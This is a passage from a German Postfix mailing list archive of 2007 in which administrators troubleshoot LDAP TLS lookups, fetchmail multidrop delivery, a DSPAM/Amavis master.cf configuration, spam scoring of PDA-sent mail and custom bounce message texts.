Ahnung woran das liegen könnte. Wenn ich es mit Postmap oder ldapsearch auf der Konsole wie folgt teste, funktionert es auch wunderbar. ####################################################################### postmap -q "domain.de" ldap:relay_domain ldapsearch -x -ZZ ####################################################################### Durch den Parameter -ZZ wird die TLS-Verbindung erzwungen, ergo kann ich davon ausgehen, dass TLS auf dem LDAP richtig konfiguriert ist. Hat jemand ne Ahnung was ich bei Postfix falsch mache!? Cheers, Artur -- "There are 10 kinds of people in the world, those who understand binary math, and those who don't." From s.neukirchner at konabi.de Wed Nov 14 15:40:31 2007 From: s.neukirchner at konabi.de (Sven Neukirchner) Date: Wed, 14 Nov 2007 15:40:31 +0100 Subject: [Postfixbuch-users] fetchmail postfix multidrop und mailinglisten Message-ID: <000001c826cc$4f5d5640$96ffa8c0@nicos.local> Hallo, ich habe ein Problem mit fetchmail beim Abrufen eines Multidrop Postfaches. Das Problem tritt nur bei Mails auf die an Mitgliedern von Mailinglisten gesendet wurden, da hier der eigentliche Empfänger nicht im TO: Feld steht. Das Problem ist bekannt, und ich wollte es mit folgender fetchmailrc lösen: set no bouncemail set postmaster root poll mail.domain.de proto pop3 nodns envelope 2 "Received" aka domain.de user "username" pass passwort" is * Mit envelop 2 "Received" habe ich also im zweiten Receive Eintrag im Mailheader nach dem eigentlichen Empfänger gesucht. Das lief soweit ganz gut. Nun ist eine neue Mailingliste dazugekommen, bei der der eigentliche Empfänger nicht im 2. Received Header steht. Dadurch bricht fetchmail den Empfang der Mails mit folgender Meldung ab: fetchmail: SMTP> MAIL FROM: SIZE=9657534 fetchmail: SMTP< 250 Ok fetchmail: SMTP> RCPT TO:<"Undisclosed-Recipient:;"@localhost> fetchmail: SMTP< 550 : Recipient address rejected: User unknown in local recipient table fetchmail: SMTP-Fehler: 550 : Recipient address rejected: User unknown in local recipient table fetchmail: SMTP-Lauscher mag Empfängeradresse ,,"Undisclosed-Recipient:;"@localhost" nicht gethostbyname fehlgeschlagen für servername Alle nachstehenden Mails können dann nicht abgerufen werden. Gelöst habe ich das nun erst einmal mit einen Eintrag in der /etc/postfix/virtual: Undisclosed-Recipient:;@localhost user at localhost Das funktioniert, gefällt mir aber nicht wirklich. Kann ich Postfix dazu bringen auch Mails anzunehmen für denen er keinen lokalen Empfänger hat? Diese Mails sollte dann automatisch an den Postmaster gehen. Da gibt’s doch sicherlich einen Eintrag in der main.cf. Oder welche andere Lösung könnt Ihr vorschlagen? Danke für die Hilfe. From listen at silviosiefke.de Wed Nov 14 16:21:08 2007 From: listen at silviosiefke.de (Silvio Siefke) Date: Wed, 14 Nov 2007 16:21:08 +0100 Subject: [Postfixbuch-users] Postfix+DSPAM+Amavisd-New Message-ID: <473B1264.1090604@silviosiefke.de> Hallo, ich versuche gerade oben genanntes System ans laufen zu bekommen. 1.) Dspam 3.8.0 ./configure --prefix=/usr/local/dspam --with-mysql-includes=/usr/include/mysql --with-mysql-libraries=/usr/lib --with-dspam-home=/var/amavis/dspam --with-dspam-owner=amavis --with-dspam-group=amavis --enable-virtual-users --enable-preferences-extension --enable-long-usernames --enable-virtual-users --without-delivery-agent --without-quarantine-agent --enable-daemon --enable-domain-scale make && make install 2.) Postfix 2.3.8, Postfixadmin 3.) Maia Mailguard 1.0.2a 4.) Debian Etch Ich habe versucht das über content_filter einzubinden, entsprechende Einträge in der master.cf --------------------------------------------------------------------- smtp inet n - n - 50 smtpd -o smtpd_proxy_filter=10024 -o smtp_send_xforward_command=yes -o smtpd_proxy_timeout=200s -o smtp_use_tls=no -o smtp_skip_quit_response=no -o receive_override_options=no_header_body_checks -o smtp_host_lookup=dns -o disable_mime_output_conversion=yes -o smtpd_client_connection_count_limit=100 :10025 inet n - n - 50 smtpd -o content_filter=lmtp:localhost:24 -o lmtp_send_xforward_command=yes -o lmtp_destination_concurrency_limit=5 -o smtpd_client_restrictions= -o smtpd_helo_restrictions= -o smtpd_sender_restrictions= -o smtpd_error_sleep_time=0 -o smtpd_recipient_restrictions=permit_mynetworks,reject -o disable_mime_output_conversion=yes -o receive_override_options=no_unknown_recipient_checks,no_header_body_checks :10026 inet n - n - 50 smtpd -o content_filter= -o smtpd_client_restrictions= -o smtpd_helo_restrictions= -o smtpd_sender_restrictions= -o smtpd_error_sleep_time=0 -o smtpd_recipient_restrictions=permit_mynetworks,reject -o receive_override_options=no_unknown_recipient_checks -o disable_mime_output_conversion=yes -o milter_macro_daemon_name=ORIGINATING -o milter_default_action=accept -o milter_protocol=3 submission inet n - - - 50 smtpd -o smtp_send_xforward_command=yes -o smtpd_proxy_filter=10024 -o smtpd_proxy_timeout=200s -o smtp_use_tls=no -o smtp_skip_quit_response=no -o smtp_host_lookup=dns --------------------------------------------------------------------- So erkennt aber Postfix nicht einmal die eigene Mailadressen mehr. Nov 14 15:02:05 m58s08 postfix/smtpd[6701]: 1E3C538607: client=mail.gmx.net[213.165.64.20] Nov 14 15:02:05 m58s08 postfix/cleanup[6829]: 1E3C538607: message-id=<473B0DA3.5050209 at gmx.de> Nov 14 15:02:05 m58s08 postfix/qmgr[6695]: 1E3C538607: from=, size=944, nrcpt=1 (queue active) Nov 14 15:02:05 m58s08 postfix/smtpd[6701]: disconnect from mail.gmx.net[213.165.64.20] Nov 14 15:02:05 m58s08 dspam[6833]: No such feature 'chained' Nov 14 15:02:05 m58s08 postfix/smtpd[6834]: connect from m58s08.vlinux.de[83.151.21.74] Nov 14 15:02:05 m58s08 postfix/smtpd[6834]: B7D3938609: client=m58s08.vlinux.de[83.151.21.74] Nov 14 15:02:05 m58s08 postfix/cleanup[6829]: B7D3938609: message-id=<473B0DA3.5050209 at gmx.de> Nov 14 15:02:05 m58s08 postfix/qmgr[6695]: B7D3938609: from=, size=1508, nrcpt=1 (queue active) Nov 14 15:02:05 m58s08 postfix/smtpd[6834]: disconnect from m58s08.vlinux.de[83.151.21.74] Nov 14 15:02:05 m58s08 amavis[4047]: (04047-06) Passed CLEAN, [213.165.64.20] -> , Message-ID: <473B0DA3.5050209 at gmx.de>, Hits: -0.1, 642 ms Nov 14 15:02:05 m58s08 postfix/smtp[6830]: 1E3C538607: to=, relay=83.151.21.74[83.151.21.74]:10024, delay=0.76, delays=0.1/0.01/0/0.64, dsn=2.6.0, status=sent (250 2.6.0 Ok, id=04047-06, from MTA: 250 2.0.0 Ok: queued as B7D3938609) Nov 14 15:02:05 m58s08 postfix/qmgr[6695]: B7D3938609: removed Ich habe den einzigen LocalHost Eintrag in der master.cf geändert in die IP, dabei erhielt ich den nachfolgenden Logeintrag: Nov 14 15:16:05 m58s08 postfix/smtpd[8515]: warning: proxy 10024 rejected "RCPT TO: ORCPT=rfc822;maia at silviosiefke.de": "504 5.5.4 RCPT command parameter not implemented: ORCPT=rfc822;maia at silviosiefke.de" Nov 14 15:16:06 m58s08 postfix/smtpd[8515]: disconnect from cerberus.renaissoft.com[24.82.114.254] Hat jemand Rat? MFG Silvio Siefke www.silviosiefke.de From peter.bauernfeind at reba-eno.de Wed Nov 14 16:49:34 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Wed, 14 Nov 2007 16:49:34 +0100 Subject: [Postfixbuch-users] Postfix+DSPAM+Amavisd-New In-Reply-To: <473B1264.1090604@silviosiefke.de> References: <473B1264.1090604@silviosiefke.de> Message-ID: <473B190E.6070504@reba-eno.de> Silvio Siefke schrieb: > --------------------------------------------------------------------- > smtp inet n - n - 50 smtpd > -o smtpd_proxy_filter=10024 > sollte hier nicht ein -o smtpd_proxy_filter=127.0.0.1:10024 stehen? Genauso weiter unten. > -o smtp_send_xforward_command=yes > -o smtpd_proxy_timeout=200s > -o smtp_use_tls=no > -o smtp_skip_quit_response=no > -o receive_override_options=no_header_body_checks > -o smtp_host_lookup=dns > -o disable_mime_output_conversion=yes > -o smtpd_client_connection_count_limit=100 > :10025 inet n - n - 50 smtpd > -o content_filter=lmtp:localhost:24 > -o lmtp_send_xforward_command=yes > -o lmtp_destination_concurrency_limit=5 > -o smtpd_client_restrictions= > -o smtpd_helo_restrictions= > -o smtpd_sender_restrictions= > -o smtpd_error_sleep_time=0 > -o smtpd_recipient_restrictions=permit_mynetworks,reject > -o disable_mime_output_conversion=yes > -o > receive_override_options=no_unknown_recipient_checks,no_header_body_checks > :10026 inet n - n - 50 smtpd > -o content_filter= > -o smtpd_client_restrictions= > -o smtpd_helo_restrictions= > -o smtpd_sender_restrictions= > -o smtpd_error_sleep_time=0 > -o smtpd_recipient_restrictions=permit_mynetworks,reject > -o receive_override_options=no_unknown_recipient_checks > -o disable_mime_output_conversion=yes > -o milter_macro_daemon_name=ORIGINATING > -o milter_default_action=accept > -o milter_protocol=3 > submission inet n - - - 50 smtpd > -o smtp_send_xforward_command=yes > -o smtpd_proxy_filter=10024 > Hier fehlt auch noch der Host-teil. > -o smtpd_proxy_timeout=200s > -o smtp_use_tls=no > -o smtp_skip_quit_response=no > -o smtp_host_lookup=dns > --------------------------------------------------------------------- > > Mit freundlichem Gruß Peter Bauernfeind From peter.bauernfeind at reba-eno.de Wed Nov 14 16:57:59 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Wed, 14 Nov 2007 16:57:59 +0100 Subject: [Postfixbuch-users] Postfix+DSPAM+Amavisd-New In-Reply-To: <473B1264.1090604@silviosiefke.de> References: <473B1264.1090604@silviosiefke.de> Message-ID: <473B1B07.8080303@reba-eno.de> Hallo Silvio, vergiss die Mail von gerade. Ich habe in der Doku nicht bis zum Ende gelesen. Ist das richtig, daß du bei :10026 an lmtp:localhost:*24* auslieferst? Mit freundlichem Gruß Peter Bauernfeind From listen at silviosiefke.de Wed Nov 14 18:21:08 2007 From: listen at silviosiefke.de (Silvio Siefke) Date: Wed, 14 Nov 2007 18:21:08 +0100 Subject: [Postfixbuch-users] Postfix+DSPAM+Amavisd-New In-Reply-To: <473B1B07.8080303@reba-eno.de> References: <473B1264.1090604@silviosiefke.de> <473B1B07.8080303@reba-eno.de> Message-ID: <473B2E84.8060305@silviosiefke.de> Peter Bauernfeind schrieb: > Hallo Silvio, > > vergiss die Mail von gerade. Ich habe in der Doku nicht bis zum Ende > gelesen. > > Ist das richtig, daß du bei :10026 an lmtp:localhost:*24* auslieferst? Ich denke mal ja, ich habe das von der Dspam Liste bekomnmen. 24, ist das nicht der DSPAM Port, mh, wofür dann 10026. MFG Silvio From postfixbuch at thomas-schwenski.de Wed Nov 14 21:02:52 2007 From: postfixbuch at thomas-schwenski.de (Thomas Schwenski) Date: Wed, 14 Nov 2007 21:02:52 +0100 Subject: [Postfixbuch-users] Spammail vom eigenen Server!? Message-ID: <473B546C.6000509@thomas-schwenski.de> Hallo, heute morgen habe ich das erste Mal eine Mail vom PDA verschickt und obwohl die meinen Server nie verlassen hat (Absender & Empfänger liegen auf demselben Server), stuft Amavisd-new/Spamassassin die Mail als Spam ein. Ursache sind wohl Einträge auf Blacklists. X-Spam-Flag: YES X-Spam-Score: 6.609 X-Spam-Level: ****** X-Spam-Status: Yes, score=6.609 tagged_above=-999 required=5 tests=[MSGID_FROM_MTA_ID=0.927, RCVD_IN_BL_SPAMCOP_NET=1.332, RCVD_IN_SORBS_WEB=1.236, RCVD_IN_XBL=3.114] Nachdem ich ausgeschlossen habe, dass mein Server irgendwo gelistet ist, war ich etwas verwirrt, da keiner der in den Received-Einträgen angegebenen Server irgendwo gelistet ist. (Mittels http://dnsstuff.com/ gecheckt.) Checke ich aber die IP meines PDAs, dann sieht das ganz anders aus und es tauchen einige Rote Einträge in der Liste auf. Received: from Inbox (1.106.113.82.net.de.o2.com [82.113.106.1]) by mail.example.com (Postfix) with ESMTP id 2DA699BC148 for ; Wed, 14 Nov 2007 07:16:40 +0100 (CET) Als Client-Tool verwende ich "Messaging" von Windows Mobile 6. Eigentlich authentifiziert der sich auch. Wie kann ich verhindern, dass meine Mails als Spam markiert werden. Gruß Thomas From mluser at rbmail.ch Wed Nov 14 21:32:57 2007 From: mluser at rbmail.ch (Andre Keller) Date: Wed, 14 Nov 2007 21:32:57 +0100 Subject: [Postfixbuch-users] Spammail vom eigenen Server!? In-Reply-To: <473B546C.6000509@thomas-schwenski.de> References: <473B546C.6000509@thomas-schwenski.de> Message-ID: <473B5B79.6010302@rbmail.ch> Thomas Schwenski schrieb: > Als Client-Tool verwende ich "Messaging" von Windows Mobile 6. > Eigentlich authentifiziert der sich auch. > > Wie kann ich verhindern, dass meine Mails als Spam markiert werden. > > Wenn ich mich nicht irre und sich das Gerät wirklich authentifiziert sollte smtpd_sasl_authenticated_header = yes in der main.cf helfen > Gruß > > Thomas > Regards André From mrg at unimx.de Wed Nov 14 21:39:57 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Wed, 14 Nov 2007 21:39:57 +0100 Subject: [Postfixbuch-users] Postfix 2.4 DSN / ESN eigene Status-Texte Message-ID: <000d01c826fe$8536d110$8fa47330$@de> Wie kann ich es erreichen, dass Postfix als Error Status nicht mehr 452 4.2.2 Over quota Sondern z.B. 452 4.2.2 Postbox voll liefert? Geht das auch im bounce_template_file ? Wenn ja wie? Danke Martin -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From Ralf.Hildebrandt at charite.de Wed Nov 14 21:45:54 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Wed, 14 Nov 2007 21:45:54 +0100 Subject: [Postfixbuch-users] Postfix 2.4 DSN / ESN eigene Status-Texte In-Reply-To: <000d01c826fe$8536d110$8fa47330$@de> References: <000d01c826fe$8536d110$8fa47330$@de> Message-ID: <20071114204554.GK1482@charite.de> * mrg at unimx.de : > > > Wie kann ich es erreichen, dass Postfix als Error Status nicht mehr > > > > 452 4.2.2 Over quota > > > > Sondern z.B. > > > > 452 4.2.2 Postbox voll > > > > liefert? Das ist keine Standardmeldung. Wo kommt die denn her? -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de Shit doesn't just happen. Shit takes time. Shit takes effort. From mrg at unimx.de Wed Nov 14 23:28:16 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Wed, 14 Nov 2007 23:28:16 +0100 Subject: [Postfixbuch-users] Postfix 2.4 DSN / ESN eigene Status-Texte In-Reply-To: <20071114204554.GK1482@charite.de> References: <000d01c826fe$8536d110$8fa47330$@de> <20071114204554.GK1482@charite.de> Message-ID: <002a01c8270d$a715a1d0$f540e570$@de> > Das ist keine Standardmeldung. Wo kommt die denn her? Die kommt vom Postfix nehm ich an. Habe Postfix und Cyrus-IMAP installiert. (OpenSuse RPM) War bei allen Postfixversionen der Fall. Ich will auch z.B. 550 : Recipient address rejected: User unknown in virtual alias table; ändern so dass ein anderer Text erscheint. Generell: Kann man die Texte vom Postfix ändern? Postfix müsste z.B. folgende Statusmeldungen haben: X.2.0 Other or undefined mailbox status X.2.1 Mailbox disabled, not accepting messages X.2.2 Mailbox full X.2.3 Message length exceeds administrative limit. X.5.0 Other or undefined protocol status X.5.1 Invalid commanda X.5.2 Syntax error X.5.3 Too many recipients X.5.4 Invalid command arguments X.5.5 Wrong protocol version X.7.0 Other or undefined security status X.7.1 Delivery not authorized, message refused X.7.2 Mailing list expansion prohibited X.7.3 Security conversion required but not possible X.7.4 Security features not supported X.7.5 Cryptographic failure X.7.6 Cryptographic algorithm not Die würde ich gerne etwas ändern (z.B. auf deutsch). Grüße Martin From Ralf.Hildebrandt at charite.de Thu Nov 15 00:57:07 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Thu, 15 Nov 2007 00:57:07 +0100 Subject: [Postfixbuch-users] Postfix 2.4 DSN / ESN eigene Status-Texte In-Reply-To: <002a01c8270d$a715a1d0$f540e570$@de> References: <000d01c826fe$8536d110$8fa47330$@de> <20071114204554.GK1482@charite.de> <002a01c8270d$a715a1d0$f540e570$@de> Message-ID: <20071114235707.GB26659@charite.de> * mrg at unimx.de : > > > Das ist keine Standardmeldung. Wo kommt die denn her? > > Die kommt vom Postfix nehm ich an. Nö. > Ich will auch z.B. > 550 : Recipient address rejected: User unknown in virtual > alias table; > > ändern so dass ein anderer Text erscheint. Im Quelltext. > Generell: > Kann man die Texte vom Postfix ändern? Im Quelltext. -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de Q: What's tiny and yellow and very, very, dangerous? A: A canary with the super-user password. From nighthawk at gmail.com Thu Nov 15 00:33:00 2007 From: nighthawk at gmail.com (nighthawk) Date: Thu, 15 Nov 2007 00:33:00 +0100 Subject: [Postfixbuch-users] Postfix 2.4 DSN / ESN eigene Status-Texte In-Reply-To: <002a01c8270d$a715a1d0$f540e570$@de> References: <000d01c826fe$8536d110$8fa47330$@de> <20071114204554.GK1482@charite.de> <002a01c8270d$a715a1d0$f540e570$@de> Message-ID: <7832fd560711141533x7065d8bcqad3ee3eae7bdf42b@mail.gmail.com> On Nov 14, 2007 11:28 PM, wrote: > Die würde ich gerne etwas ändern (z.B. auf deutsch). Abgesehen davon, daß die m.W. in Postfix fest einkompiliert sind (also nur im Source geändert werden können), würde ich das lassen. Ich ärgere mich immer, wenn ich Bounces mit lokalisierten Fehlertexten in Sprachen bekomme, die ich nicht verstehe und ich gehe stark davon aus, daß es Leuten im nicht-deutschsprachigen Raum kaum anders gehen würde, wenn Dein Server nur deutsche Meldungen ausspuckt. From mhaegele at linuxrocks.dyndns.org Thu Nov 15 09:56:29 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Thu, 15 Nov 2007 09:56:29 +0100 Subject: [Postfixbuch-users] Spammail vom eigenen Server!? In-Reply-To: <473B546C.6000509@thomas-schwenski.de> References: <473B546C.6000509@thomas-schwenski.de> Message-ID: <473C09BD.1070902@linuxrocks.dyndns.org> Thomas Schwenski schrieb: > Hallo, > > heute morgen habe ich das erste Mal eine Mail vom PDA verschickt und > obwohl die meinen Server nie verlassen hat (Absender & Empfänger liegen > auf demselben Server), stuft Amavisd-new/Spamassassin die Mail als Spam ein. > > Ursache sind wohl Einträge auf Blacklists. > > X-Spam-Flag: YES > X-Spam-Score: 6.609 > X-Spam-Level: ****** > X-Spam-Status: Yes, score=6.609 tagged_above=-999 required=5 > tests=[MSGID_FROM_MTA_ID=0.927, RCVD_IN_BL_SPAMCOP_NET=1.332, > RCVD_IN_SORBS_WEB=1.236, RCVD_IN_XBL=3.114] > > Nachdem ich ausgeschlossen habe, dass mein Server irgendwo gelistet ist, > war ich etwas verwirrt, da keiner der in den Received-Einträgen > angegebenen Server irgendwo gelistet ist. > (Mittels http://dnsstuff.com/ gecheckt.) > > Checke ich aber die IP meines PDAs, dann sieht das ganz anders aus und > es tauchen einige Rote Einträge in der Liste auf. Jo. Sieht halt dann so aus als kommt das aus einem "Dialup-Bereich", stimmt ja auch ... > Received: from Inbox (1.106.113.82.net.de.o2.com [82.113.106.1]) > by mail.example.com (Postfix) with ESMTP id 2DA699BC148 > for ; Wed, 14 Nov 2007 07:16:40 +0100 (CET) > > Als Client-Tool verwende ich "Messaging" von Windows Mobile 6. > Eigentlich authentifiziert der sich auch. Eigentlich oder wirklich, wirklich? ;-). > Wie kann ich verhindern, dass meine Mails als Spam markiert werden. Ergänzend zu Andres Post: http://wiki.apache.org/spamassassin/DynablockIssues Da steht noch: (allerdings nur im Zusammenhang mit einem Workaround): Note the use of your server's hostname, so that spammers cannot fake the data without knowledge of your server's header format and so on. Wie macht man das denn nun richtig? > Gruß > > Thomas -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From peter.bauernfeind at reba-eno.de Thu Nov 15 09:55:47 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Thu, 15 Nov 2007 09:55:47 +0100 Subject: [Postfixbuch-users] Postfix+DSPAM+Amavisd-New In-Reply-To: <473B2E84.8060305@silviosiefke.de> References: <473B1264.1090604@silviosiefke.de> <473B1B07.8080303@reba-eno.de> <473B2E84.8060305@silviosiefke.de> Message-ID: <473C0993.5090205@reba-eno.de> Silvio Siefke schrieb: > Peter Bauernfeind schrieb: > >> Hallo Silvio, >> >> vergiss die Mail von gerade. Ich habe in der Doku nicht bis zum Ende >> gelesen. >> >> Ist das richtig, daß du bei :10026 an lmtp:localhost:*24* auslieferst? >> > > Ich denke mal ja, ich habe das von der Dspam Liste bekomnmen. 24, ist das > nicht der DSPAM Port, mh, wofür dann 10026. > Die Mail kommt auf Port 10026 rein und soll auf Port 24 wieder raus. Und ob Dspam auf Port 24 annimmt mußt du dort schauen. Ich würde alles in den IP-Bereich oberhalb von 10025 verlegen und zwar so, daß der eingehende immer eine kleinere Portnummer bekommt als der ausliefernde und in der master.cf von oben nach unten abgearbeitet wird. Das hilft die Fehlerquelle vor der Tastatur zu reduzieren. ;-) Und eventuell hilft es auch wenn du überall explizit die localhost IP 127.0.0.1 angibst. Laut Doku ist das nicht notwendig, aber zumindest wird es leichter lesbar (für mich). :-) Mit freundlichem Gruß Peter Bauernfeind From mrg at unimx.de Thu Nov 15 14:18:45 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Thu, 15 Nov 2007 14:18:45 +0100 Subject: [Postfixbuch-users] Postfix 2.4 DSN / ESN eigene Status-Texte In-Reply-To: <7832fd560711141533x7065d8bcqad3ee3eae7bdf42b@mail.gmail.com> References: <000d01c826fe$8536d110$8fa47330$@de> <20071114204554.GK1482@charite.de> <002a01c8270d$a715a1d0$f540e570$@de> <7832fd560711141533x7065d8bcqad3ee3eae7bdf42b@mail.gmail.com> Message-ID: <011a01c8278a$107e9380$317bba80$@de> >Abgesehen davon, daß die m.W. in Postfix fest einkompiliert sind (also >nur im Source geändert werden können), würde ich das lassen. Ich >ärgere mich immer, wenn ich Bounces mit lokalisierten Fehlertexten in >Sprachen bekomme, die ich nicht verstehe und ich gehe stark davon aus, >daß es Leuten im nicht-deutschsprachigen Raum kaum anders gehen würde, >wenn Dein Server nur deutsche Meldungen ausspuckt. Da kann man geteilter Meinung sein. Bei mir beschweren sich immer die Leute weil sie Over Quota nicht verstehen :) From mrg at unimx.de Thu Nov 15 14:30:28 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Thu, 15 Nov 2007 14:30:28 +0100 Subject: [Postfixbuch-users] Postfix 2.4 DSN / ESN eigene Status-Texte In-Reply-To: <20071114235707.GB26659@charite.de> References: <000d01c826fe$8536d110$8fa47330$@de> <20071114204554.GK1482@charite.de> <002a01c8270d$a715a1d0$f540e570$@de> <20071114235707.GB26659@charite.de> Message-ID: <011b01c8278b$afdfdb40$0f9f91c0$@de> >> >> > Das ist keine Standardmeldung. Wo kommt die denn her? >> >> Die kommt vom Postfix nehm ich an. >Nö. Hm dann muss sie vom Cyrus kommen. >> Ich will auch z.B. >> 550 : Recipient address rejected: User unknown in virtual >> alias table; >> >> ändern so dass ein anderer Text erscheint. >Im Quelltext. Schade, dachte mit dem Template geht das auch, hatte extra das neue Postfix eingespielt. Wo im Quelltext finde ich das denn, hab schon ewig gesucht und nichts gefunden. Gibt es echt keine andere Möglichkeit? Aber danke soweit Martin -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de Q: What's tiny and yellow and very, very, dangerous? A: A canary with the super-user password. -- _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listi.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From nighthawk at gmail.com Thu Nov 15 14:33:50 2007 From: nighthawk at gmail.com (nighthawk) Date: Thu, 15 Nov 2007 14:33:50 +0100 Subject: [Postfixbuch-users] Postfix 2.4 DSN / ESN eigene Status-Texte In-Reply-To: <011a01c8278a$107e9380$317bba80$@de> References: <000d01c826fe$8536d110$8fa47330$@de> <20071114204554.GK1482@charite.de> <002a01c8270d$a715a1d0$f540e570$@de> <7832fd560711141533x7065d8bcqad3ee3eae7bdf42b@mail.gmail.com> <011a01c8278a$107e9380$317bba80$@de> Message-ID: <7832fd560711150533s2ac4c189n67483e068a6daf7b@mail.gmail.com> On Nov 15, 2007 2:18 PM, wrote: >> Abgesehen davon, daß die m.W. in Postfix fest einkompiliert sind (also >> nur im Source geändert werden können), würde ich das lassen. Ich >> ärgere mich immer, wenn ich Bounces mit lokalisierten Fehlertexten in >> Sprachen bekomme, die ich nicht verstehe und ich gehe stark davon aus, >> daß es Leuten im nicht-deutschsprachigen Raum kaum anders gehen würde, >> wenn Dein Server nur deutsche Meldungen ausspuckt. > > Da kann man geteilter Meinung sein. Bei mir beschweren sich immer die Leute > weil sie Over Quota nicht verstehen :) Ja, aber wenn sich Deine Kunden beschweren, dann sind es doch fremde Mailserver, die die Fehlermeldung ausgeben. _Die_ bekommst Du sowieso nicht geändert. From mrg at unimx.de Thu Nov 15 15:34:46 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Thu, 15 Nov 2007 15:34:46 +0100 Subject: [Postfixbuch-users] Postfix 2.4 DSN / ESN eigene Status-Texte In-Reply-To: <7832fd560711150533s2ac4c189n67483e068a6daf7b@mail.gmail.com> References: <000d01c826fe$8536d110$8fa47330$@de> <20071114204554.GK1482@charite.de> <002a01c8270d$a715a1d0$f540e570$@de> <7832fd560711141533x7065d8bcqad3ee3eae7bdf42b@mail.gmail.com> <011a01c8278a$107e9380$317bba80$@de> <7832fd560711150533s2ac4c189n67483e068a6daf7b@mail.gmail.com> Message-ID: <015d01c82794$ab9ec010$02dc4030$@de> >>> Abgesehen davon, daß die m.W. in Postfix fest einkompiliert sind (also >>> nur im Source geändert werden können), würde ich das lassen. Ich >>> ärgere mich immer, wenn ich Bounces mit lokalisierten Fehlertexten in >>> Sprachen bekomme, die ich nicht verstehe und ich gehe stark davon aus, >>> daß es Leuten im nicht-deutschsprachigen Raum kaum anders gehen würde, >>> wenn Dein Server nur deutsche Meldungen ausspuckt. >> >> Da kann man geteilter Meinung sein. Bei mir beschweren sich immer die Leute >> weil sie Over Quota nicht verstehen :) >Ja, aber wenn sich Deine Kunden beschweren, dann sind es doch fremde >Mailserver, die die Fehlermeldung ausgeben. _Die_ bekommst Du sowieso >nicht geändert. Naja aber mein Mailserver liefert ja den Status (Bounce) an den Sendermailserver. _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listi.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From driessen at fblan.de Thu Nov 15 17:16:28 2007 From: driessen at fblan.de (Uwe Driessen) Date: Thu, 15 Nov 2007 17:16:28 +0100 Subject: [Postfixbuch-users] Postfix 2.4 DSN / ESN eigene Status-Texte In-Reply-To: <015d01c82794$ab9ec010$02dc4030$@de> References: <000d01c826fe$8536d110$8fa47330$@de> <20071114204554.GK1482@charite.de> <002a01c8270d$a715a1d0$f540e570$@de> <7832fd560711141533x7065d8bcqad3ee3eae7bdf42b@mail.gmail.com> <011a01c8278a$107e9380$317bba80$@de><7832fd560711150533s2ac4c189n67483e068a6daf7b@mail.gmail.com> <015d01c82794$ab9ec010$02dc4030$@de> Message-ID: <001901c827a2$e07cf550$0565a8c0@uwe> Behalf Of mrg at unimx.de > > >Ja, aber wenn sich Deine Kunden beschweren, dann sind es doch fremde > >Mailserver, die die Fehlermeldung ausgeben. _Die_ bekommst Du sowieso > >nicht geändert. > > Naja aber mein Mailserver liefert ja den Status (Bounce) an den > Sendermailserver. > Arrrrgh und du willst dann die Bouncemails die ein fremder Server schickt umschreiben? mal abgesehen davon das das rechtliche Problematisch ist ein fast sinnloses unterfangen mach für deine Kunden lieber eine Webseite auf denen du diese Meldungen übersetzt Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From mrg at unimx.de Thu Nov 15 17:35:22 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Thu, 15 Nov 2007 17:35:22 +0100 Subject: [Postfixbuch-users] Postfix 2.4 DSN / ESN eigene Status-Texte In-Reply-To: <001901c827a2$e07cf550$0565a8c0@uwe> References: <000d01c826fe$8536d110$8fa47330$@de> <20071114204554.GK1482@charite.de> <002a01c8270d$a715a1d0$f540e570$@de> <7832fd560711141533x7065d8bcqad3ee3eae7bdf42b@mail.gmail.com> <011a01c8278a$107e9380$317bba80$@de><7832fd560711150533s2ac4c189n67483e068a6daf7b@mail.gmail.com> <015d01c82794$ab9ec010$02dc4030$@de> <001901c827a2$e07cf550$0565a8c0@uwe> Message-ID: <01af01c827a5$84e86910$8eb93b30$@de> Nein, den Bounce schicke doch ich (mein Postfix). z.B. meldet (bounced) mein Postfix, dass das Postfach voll ist. Grüße Martin -----Ursprüngliche Nachricht----- Von: postfixbuch-users-bounces at listi.jpberlin.de [mailto:postfixbuch-users-bounces at listi.jpberlin.de] Im Auftrag von Uwe Driessen Gesendet: Donnerstag, 15. November 2007 17:16 An: 'Eine Diskussionsliste rund um das Postfix-Buch von Peer Heinlein.' Betreff: Re: [Postfixbuch-users] Postfix 2.4 DSN / ESN eigene Status-Texte Behalf Of mrg at unimx.de > > >Ja, aber wenn sich Deine Kunden beschweren, dann sind es doch fremde > >Mailserver, die die Fehlermeldung ausgeben. _Die_ bekommst Du sowieso > >nicht geändert. > > Naja aber mein Mailserver liefert ja den Status (Bounce) an den > Sendermailserver. > Arrrrgh und du willst dann die Bouncemails die ein fremder Server schickt umschreiben? mal abgesehen davon das das rechtliche Problematisch ist ein fast sinnloses unterfangen mach für deine Kunden lieber 